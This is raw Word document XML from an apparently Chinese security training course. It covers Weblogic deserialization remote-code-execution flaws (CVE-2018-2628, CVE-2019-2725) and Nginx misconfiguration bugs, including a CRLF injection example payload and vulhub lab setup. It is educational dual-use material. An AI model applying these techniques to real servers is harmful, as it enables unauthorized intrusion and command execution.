          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>加载此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件并执行其中的命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5C60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5、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进入docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>容器内发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>success2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件创建成功，表示代码指令执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AABBE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此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>利用方法缺点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要Weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的服务器能够访问到恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F68F8F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color w:val="808080" w:themeColor="background1" w:themeShade="8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color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8.6 Weblogic的其它反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE6593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Fonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下面两个反序列化漏洞自行研究，其中2019年那个在安全开发部分也会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB7F5D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Weblogic WLS Core Components反序列化命令执行漏洞(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CVE-2018-2628</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111C6C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漏洞说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203E91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Weblogic Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过T3协议实现RMI通信，该协议用于在其服务器实例与Java程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>无论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1293B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是客户端还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Weblogic Server实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>之间传输数据。服务器实例会监控连接至应用程序的每</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9A45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个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Java虚拟机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JVM），并建立T3通信连接，以此将数据流量导向相应的Java虚拟机。T3协议在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E203F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lastRenderedPageBreak/>
        <w:t>WebLogic控制台端口上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启用。然而这一特性也可能被攻击者利用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过发送恶意反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BF896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数据来进行反序列化操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对存在缺陷的Weblogic组件执行远程代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0615D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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Oracle Weblogic Server10.3.6.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.1.3.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.2.0</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4681D85D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Weblogic反序列化远程代码执行漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CVE-2019-2725）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E56452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漏洞说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA782B8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WebLogic Server的wls9-async组件负责提供异步通信服务，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并在某些WebLogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本中默</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EA47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认安装。然而该组件在处理反序列化输入时存在安全漏洞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击者可以利用这一缺陷，通过发送</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63071D2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特定构造的恶意HTTP请求，来实现对目标服务器的未授权访问，并在远程执行命令，从而获得服</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5368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务器控制权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343ACEF0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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 10.*</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 12.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F218F8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影响组件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bea_wls9_async_response.war</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wsat.war</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558AF1D2" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="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九、Web服务器之Nginx漏洞介绍(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>面试常问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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BFAB3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bookmarkStart w:id="3" w:name="_Toc30386"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9.1 Nginx的三个配置错误漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1F7D971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三个配置不当导致的nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞，对所有版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>都有影响，且容易引起忽视。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019528D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①CRLF注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680A9DD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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101576F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CRLF是指"回车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>换行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"组合，编码为\r\n，在十六进制中为0x0d和0x0a分别代表回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83F02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车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Carriage Return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和换行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Line Feed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字符。在网络通信中，CRLF常被用作数据分隔符。特别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FDB5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是在HTTP协议中，消息头与消息头之间、消息头与消息体之间都是由CRLF 序列来分隔。浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD3DD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依据这些CRLF分隔符来解析HTTP响应，提取出网页内容进行显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2945C7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0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击者能控制用户输入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在HTTP响应的头部实施回显，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可能通过注入CRLF字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966CEB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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来恶意结束响应头部，从而在响应体中插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>内容。这种攻击方式被称为CRLF注入或HTTP响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581614A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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拆分/截断，它能允许攻击者插入额外的HTTP头部或修改现有头部，可能导致诸如跨站脚本（XSS）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62225AE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color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B051CE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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>111%0d%0a222%0d%0a%0d%0a333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33192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%0d%0a代表一个回车和换行。结果单个CRLF字符会导致文本在浏览器中换行，而两个连续的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959707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CRLF字符则会插入一个空行。这种插入可用于HTTP响应头部，从而影响响应完整性和内容展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D84F0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34E4D8E9" wp14:editId="4A622EEC">
            <wp:extent cx="6478270" cy="564515"/>
            <wp:effectExtent l="0" t="0" r="1397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1CBFF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CRLF注入漏洞与XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞在攻击方式上有相似之处，它们都涉及到攻击者向Web应用程序输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019BC33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入恶意数据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在于CRLF注入漏洞主要影响HTTP响应头，而XSS漏洞则通常影响Web页面的主</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9BE23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体内容。通常可以采用类似于检测XSS的方法检测CRLF注入漏洞：通过修改HTTP参数或URL来注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41AF9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入恶意CRLF字符，并检查这些字符是否出现在HTTP响应头中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA4332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总结，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CRLF注入是利用回车换行符进行攻击，通过注入不同数量的CRLF字符，攻击者可以操</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF09AF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纵应用程序设置任意响应头，甚至控制响应正文。此漏洞可能导致多种安全问题，包括操纵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C770D9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响应头中键值对、执行XSS攻击、发起缓存病毒攻击、以及进行日志伪造等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5040E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漏洞环境搭建：启动vulhub靶场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
